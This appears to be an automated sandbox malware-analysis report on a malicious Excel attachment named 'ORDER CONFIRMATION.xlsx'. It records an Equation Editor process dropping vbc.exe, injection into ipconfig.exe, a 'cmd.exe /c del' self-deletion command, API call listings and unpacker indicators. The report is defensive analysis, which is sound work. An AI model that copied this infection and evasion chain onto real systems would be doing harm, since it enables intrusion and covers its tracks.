      Source: C:\Users\Public\vbc.exeCode function: 8_2_00408C608_2_00408C60
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041C51E8_2_0041C51E
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D878_2_00402D87
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402D908_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B6D38_2_0041B6D3
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00402FB08_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7E0C68_2_00A7E0C6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AAD0058_2_00AAD005
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A830408_2_00A83040
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9905A8_2_00A9905A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7E2E98_2_00A7E2E9
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B212388_2_00B21238
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7F3CF8_2_00A7F3CF
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA63DB8_2_00AA63DB
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A823058_2_00A82305
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00ACA37B8_2_00ACA37B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A873538_2_00A87353
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A914898_2_00A91489
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB54858_2_00AB5485
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9C5F08_2_00A9C5F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8351F8_2_00A8351F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A846808_2_00A84680
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8E6C18_2_00A8E6C1
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B226228_2_00B22622
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8C7BC8_2_00A8C7BC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B0579A8_2_00B0579A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB57C38_2_00AB57C3
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B1F8EE8_2_00B1F8EE
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA286D8_2_00AA286D
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8C85C8_2_00A8C85C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A829B28_2_00A829B2
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B2098E8_2_00B2098E
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A969FE8_2_00A969FE
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B059558_2_00B05955
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B33A838_2_00B33A83
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B2CBA48_2_00B2CBA4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B0DBDA8_2_00B0DBDA
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7FBD78_2_00A7FBD7
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AA7B008_2_00AA7B00
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00B1FDDD8_2_00B1FDDD
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB0D3B8_2_00AB0D3B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A8CD5B8_2_00A8CD5B
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AB2E2F8_2_00AB2E2F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A9EE4C8_2_00A9EE4C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A90F3F8_2_00A90F3F
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00AADF7C8_2_00AADF7C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4E0C611_2_01F4E0C6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6905A11_2_01F6905A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5304011_2_01F53040
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7D00511_2_01F7D005
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F763DB11_2_01F763DB
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4F3CF11_2_01F4F3CF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F9A37B11_2_01F9A37B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5735311_2_01F57353
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5230511_2_01F52305
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4E2E911_2_01F4E2E9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF123811_2_01FF1238
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6C5F011_2_01F6C5F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5351F11_2_01F5351F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F8548511_2_01F85485
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6148911_2_01F61489
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F8D47D11_2_01F8D47D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F857C311_2_01F857C3
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5C7BC11_2_01F5C7BC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FD579A11_2_01FD579A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5E6C111_2_01F5E6C1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5468011_2_01F54680
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF262211_2_01FF2622
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F669FE11_2_01F669FE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F529B211_2_01F529B2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FF098E11_2_01FF098E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_02003A8311_2_02003A83
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FD595511_2_01FD5955
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FEF8EE11_2_01FEF8EE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7286D11_2_01F7286D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5C85C11_2_01F5C85C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4FBD711_2_01F4FBD7
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FDDBDA11_2_01FDDBDA
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FFCBA411_2_01FFCBA4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F77B0011_2_01F77B00
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01FEFDDD11_2_01FEFDDD
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F5CD5B11_2_01F5CD5B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F80D3B11_2_01F80D3B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F7DF7C11_2_01F7DF7C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F60F3F11_2_01F60F3F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F6EE4C11_2_01F6EE4C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F82E2F11_2_01F82E2F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DC2CA11_2_000DC2CA
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DC51E11_2_000DC51E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB6D311_2_000DB6D3
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB8D611_2_000DB8D6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DCB5C11_2_000DCB5C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C8C5D11_2_000C8C5D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C8C6011_2_000C8C60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C2D8711_2_000C2D87
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000C2D9011_2_000C2D90
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F4DF5C appears 107 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01FBF970 appears 81 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F93F92 appears 108 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F9373B appears 238 times
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 01F4E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00A7DF5C appears 107 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AEF970 appears 81 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC373B appears 238 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00AC3F92 appears 108 times
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004181C0 NtCreateFile,8_2_004181C0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00418270 NtReadFile,8_2_00418270
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004182F0 NtClose,8_2_004182F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004183A0 NtAllocateVirtualMemory,8_2_004183A0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041839A NtAllocateVirtualMemory,8_2_0041839A
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A700C4 NtCreateFile,LdrInitializeThunk,8_2_00A700C4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70078 NtResumeThread,LdrInitializeThunk,8_2_00A70078
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,8_2_00A70048
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A707AC NtCreateMutant,LdrInitializeThunk,8_2_00A707AC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F9F0 NtClose,LdrInitializeThunk,8_2_00A6F9F0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F900 NtReadFile,LdrInitializeThunk,8_2_00A6F900
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_00A6FAE8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_00A6FAD0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_00A6FBB8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_00A6FB68
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,8_2_00A6FC90
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_00A6FC60
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,8_2_00A6FD8C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_00A6FDC0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,8_2_00A6FEA0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_00A6FED0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,8_2_00A6FFB4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A710D0 NtOpenProcessToken,8_2_00A710D0
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70060 NtQuerySection,8_2_00A70060
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A701D4 NtSetValueKey,8_2_00A701D4
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7010C NtOpenDirectoryObject,8_2_00A7010C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71148 NtOpenThread,8_2_00A71148
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F8CC NtWaitForSingleObject,8_2_00A6F8CC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71930 NtSetContextThread,8_2_00A71930
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F938 NtWriteFile,8_2_00A6F938
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAB8 NtQueryValueKey,8_2_00A6FAB8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA20 NtQueryInformationFile,8_2_00A6FA20
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA50 NtEnumerateValueKey,8_2_00A6FA50
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBE8 NtQueryVirtualMemory,8_2_00A6FBE8
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB50 NtCreateKey,8_2_00A6FB50
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC30 NtOpenProcess,8_2_00A6FC30
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70C40 NtGetContextThread,8_2_00A70C40
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC48 NtSetInformationFile,8_2_00A6FC48
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71D80 NtSuspendThread,8_2_00A71D80
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD5C NtEnumerateKey,8_2_00A6FD5C
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FE24 NtWriteVirtualMemory,8_2_00A6FE24
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFFC NtCreateProcessEx,8_2_00A6FFFC
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FF34 NtQueueApcThread,8_2_00A6FF34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F400C4 NtCreateFile,LdrInitializeThunk,11_2_01F400C4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F407AC NtCreateMutant,LdrInitializeThunk,11_2_01F407AC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F9F0 NtClose,LdrInitializeThunk,11_2_01F3F9F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F900 NtReadFile,LdrInitializeThunk,11_2_01F3F900
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_01F3FBB8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01F3FB68
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB50 NtCreateKey,LdrInitializeThunk,11_2_01F3FB50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_01F3FAE8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01F3FDC0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,11_2_01F3FD8C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_01F3FC60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,11_2_01F3FFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01F3FED0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F401D4 NtSetValueKey,11_2_01F401D4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41148 NtOpenThread,11_2_01F41148
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4010C NtOpenDirectoryObject,11_2_01F4010C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F410D0 NtOpenProcessToken,11_2_01F410D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40078 NtResumeThread,11_2_01F40078
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40060 NtQuerySection,11_2_01F40060
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40048 NtProtectVirtualMemory,11_2_01F40048
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41930 NtSetContextThread,11_2_01F41930
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F938 NtWriteFile,11_2_01F3F938
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F8CC NtWaitForSingleObject,11_2_01F3F8CC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBE8 NtQueryVirtualMemory,11_2_01F3FBE8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAD0 NtAllocateVirtualMemory,11_2_01F3FAD0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAB8 NtQueryValueKey,11_2_01F3FAB8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA50 NtEnumerateValueKey,11_2_01F3FA50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA20 NtQueryInformationFile,11_2_01F3FA20
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41D80 NtSuspendThread,11_2_01F41D80
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD5C NtEnumerateKey,11_2_01F3FD5C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC90 NtUnmapViewOfSection,11_2_01F3FC90
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40C40 NtGetContextThread,11_2_01F40C40
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC48 NtSetInformationFile,11_2_01F3FC48
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC30 NtOpenProcess,11_2_01F3FC30
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFFC NtCreateProcessEx,11_2_01F3FFFC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FF34 NtQueueApcThread,11_2_01F3FF34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FEA0 NtReadVirtualMemory,11_2_01F3FEA0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FE24 NtWriteVirtualMemory,11_2_01F3FE24
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D81C0 NtCreateFile,11_2_000D81C0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D8270 NtReadFile,11_2_000D8270
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D82F0 NtClose,11_2_000D82F0
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: ORDER CONFIRMATION.xlsxVirustotal: Detection: 32%
      Source: ORDER CONFIRMATION.xlsxReversingLabs: Detection: 29%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF298.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/19@22/4
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E4D58 push esp; ret 6_2_001E4D59
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E879A push edx; retf 6_2_001E879B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_001E87CE push ds; retf 6_2_001E87CF
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00415080 push esi; ret 8_2_004150B6
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00416235 push edi; iretd 8_2_00416267
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B3B5 push eax; ret 8_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B46C push eax; ret 8_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B402 push eax; ret 8_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 8_2_0041B40B push eax; ret 8_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7DFA1 push ecx; ret 8_2_00A7DFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4DFA1 push ecx; ret 11_2_01F4DFB4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D5080 push esi; ret 11_2_000D50B6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000D6235 push edi; iretd 11_2_000D6267
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB3B5 push eax; ret 11_2_000DB408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB40B push eax; ret 11_2_000DB472
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB402 push eax; ret 11_2_000DB408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_000DB46C push eax; ret 11_2_000DB472
      Source: vbc[1].exe.4.drStatic PE information: 0x82CF36F5 [Mon Jul 18 16:08:21 2039 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.19334150193
